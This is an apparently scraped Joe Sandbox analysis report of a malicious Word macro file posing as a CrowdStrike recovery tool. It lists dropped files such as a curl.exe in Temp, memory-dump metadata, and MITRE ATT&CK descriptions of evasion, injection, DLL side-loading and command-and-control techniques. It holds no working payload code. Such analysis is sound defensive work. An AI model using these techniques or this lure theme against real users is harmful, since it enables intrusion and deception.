free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,000000013F30B6E1), ref: 000000013F312BE3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F312BF4

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 6ff657cb843d304aaa61e28a697a6e84686e4a2c000e04354a40c192b77be9a1
Instruction ID: 49c076fae7d6ab3ebdab07a31245cc501eab5203d186e8f0cc5f2ec175eb95cd
Opcode Fuzzy Hash: 6ff657cb843d304aaa61e28a697a6e84686e4a2c000e04354a40c192b77be9a1
Instruction Fuzzy Hash: B1115132A16A44C6EB60EF15E5943AC7370F788B84F148639DF4E4B624DF39C5A2C304

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Portions of files can also be encoded to hide the plaintext strings that would otherwise help defenders with discovery. Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.
Tactics:	Defense Evasion
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\41D51BF0.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B853177E.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2E26567.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB640B31.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{68411966-DD48-4946-AB3B-864E53BCEEA6}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9512A27C-373D-4C6D-8C25-ECB66CCA249E}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CD9FBDB6-0620-4DF5-9AD1-8E60378C9E3C}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp

C:\Users\user\AppData\Local\Temp\curl.exe

C:\Users\user\AppData\Local\Temp\curl.txt

C:\Users\user\AppData\Local\Temp\msoAB8B.tmp

C:\Users\user\AppData\Local\Temp\msoAFEE.tmp

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre